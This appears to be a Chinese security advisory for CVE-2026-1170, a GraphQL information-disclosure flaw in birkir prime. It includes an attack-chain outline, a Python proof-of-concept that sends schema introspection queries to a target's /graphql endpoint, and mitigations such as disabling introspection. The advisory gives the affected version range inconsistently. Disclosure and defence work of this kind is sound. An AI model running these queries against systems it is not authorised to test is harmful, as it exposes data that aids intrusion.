CVE-2026-1170 birkir prime GraphQL API信息泄露漏洞

漏洞信息

漏洞编号

CVE-2026-1170

漏洞类型

信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

birkir prime

漏洞概述

CVE-2026-1170是birkir prime项目中的一个信息泄露漏洞，该项目是一个基于GraphQL的API框架，存在版本为0.4.0.beta.0及更早版本。漏洞主要影响项目中GraphQL API的/graphql端点，攻击者可以通过发送特制的GraphQL查询请求来获取系统内部的敏感信息。这些敏感信息可能包括数据库结构、API密钥、用户数据、配置信息、内部路由信息等。由于该漏洞的利用复杂度较低，攻击者无需认证即可发起攻击，且漏洞利用代码已公开，导致该漏洞具有较高的实际威胁性。该漏洞于2026年1月19日被披露，CVSS评分为5.3，属于中危级别漏洞。虽然项目方在早期收到了漏洞报告，但截至披露时仍未做出响应或发布修复版本，建议使用者及时采取防护措施或寻找替代方案。

技术细节

该漏洞存在于birkir prime的GraphQL API实现中，具体位于/graphql端点的处理逻辑。攻击者通过构造特定的GraphQL查询语句，可以利用GraphQL的introspection（内省）功能或错误信息来获取系统的元数据信息。GraphQL的introspection功能原本是为了方便开发者调试和文档生成，但配置不当会导致敏感信息泄露。攻击者可能利用以下方式获取信息：1）发送__schema或__type查询来枚举数据库结构和API类型定义；2）通过错误消息中的堆栈跟踪或详细错误信息获取系统内部路径和配置；3）利用GraphQL查询的嵌套深度获取敏感数据关系；4）通过批量查询或字段别名绕过访问控制。由于GraphQL采用单一端点设计，攻击者只需向/graphql端点发送恶意请求即可，无需对多个端点进行扫描。攻击者获取的信息可用于进一步渗透攻击、敏感数据窃取或为其他漏洞利用提供情报支持。

攻击链分析

STEP 1

步骤1

侦查阶段：攻击者扫描目标网站，识别是否使用birkir prime框架，主要通过访问/graphql端点并发送基础查询验证GraphQL服务

STEP 2

步骤2

信息收集：利用GraphQL的__schema和__type内省查询获取数据库结构、API类型定义、字段关系等元数据信息

STEP 3

步骤3

敏感数据探测：通过分析内省结果，识别包含敏感信息的类型（如User、Config、Secret等），构造针对性查询

STEP 4

步骤4

数据提取：发送精心构造的GraphQL查询，利用查询嵌套、批量查询等技术获取敏感数据，可能包括用户信息、配置参数、内部路径等

STEP 5

步骤5

横向移动：利用获取的敏感信息（如API密钥、数据库连接字符串、内部路由）进行进一步渗透攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2026-1170 PoC - birkir prime GraphQL Information Disclosure
# Target: birkir prime <= 0.4.0.beta.0
# Endpoint: /graphql

import requests
import json

TARGET_URL = "http://target.com/graphql"

def exploit_information_disclosure():
    """Exploit for CVE-2026-1170 - GraphQL API Information Disclosure"""
    
    # PoC 1: GraphQL Introspection Query to enumerate schema
    introspection_query = {
        "query": """
            {
                __schema {
                    types {
                        name
                        fields {
                            name
                            type {
                                name
                            }
                        }
                    }
                    queryType {
                        name
                        fields {
                            name
                        }
                    }
                }
            }
        """
    }
    
    # PoC 2: Query specific types for sensitive data
    type_query = {
        "query": """
            {
                __type(name: "User") {
                    name
                    fields {
                        name
                        type {
                            name
                            kind
                        }
                    }
                }
            }
        """
    }
    
    # PoC 3: Introspection with description to find sensitive fields
    description_query = {
        "query": """
            {
                __schema {
                    types {
                        name
                        description
                        fields(includeDeprecated: true) {
                            name
                            description
                            isDeprecated
                            deprecationReason
                        }
                    }
                }
            }
        """
    }
    
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0 (compatible; CVE-2026-1170-PoC)"
    }
    
    print("[*] Testing CVE-2026-1170 - birkir prime GraphQL Info Disclosure")
    print(f"[*] Target: {TARGET_URL}")
    
    for i, payload in enumerate([introspection_query, type_query, description_query], 1):
        try:
            print(f"\n[*] Sending PoC payload {i}...")
            response = requests.post(TARGET_URL, json=payload, headers=headers, timeout=10)
            
            if response.status_code == 200:
                data = response.json()
                if "errors" not in data and data.get("data"):
                    print(f"[+] PoC {i} SUCCESS - Information disclosure detected!")
                    print(f"[+] Response preview: {json.dumps(data, indent=2)[:500]}...")
                else:
                    print(f"[-] PoC {i} - Response may contain errors or no data")
            else:
                print(f"[-] PoC {i} - HTTP {response.status_code}")
                
        except requests.exceptions.RequestException as e:
            print(f"[-] PoC {i} - Request failed: {e}")
    
    print("\n[*] PoC execution completed")
    print("[*] Recommendation: Disable GraphQL introspection in production")

if __name__ == "__main__":
    exploit_information_disclosure()

影响范围

birkir prime < 0.4.0.beta.0

防御指南

临时缓解措施

由于官方尚未发布修复版本，建议立即采取以下临时缓解措施：1）在GraphQL中间件中禁用introspection功能；2）配置错误处理机制，对外返回通用错误信息而非详细堆栈跟踪；3）实施查询深度限制（如maxDepth: 10）；4）添加查询复杂度分析，防止资源耗尽攻击；5）如果业务允许，暂时限制/graphql端点的公网访问，仅允许受信任的IP访问；6）启用GraphQL查询日志监控，及时发现异常查询模式。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-1170
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-1170
3 Details https://www.cvedetails.com/cve/CVE-2026-1170/
4 VulDB https://vuldb.com/cve/CVE-2026-1170
5 Link https://github.com/birkir/prime/
6 Link https://github.com/birkir/prime/issues/541
7 Link https://vuldb.com/?ctiid.341764
8 Link https://vuldb.com/?id.341764
9 Link https://vuldb.com/?submit.731100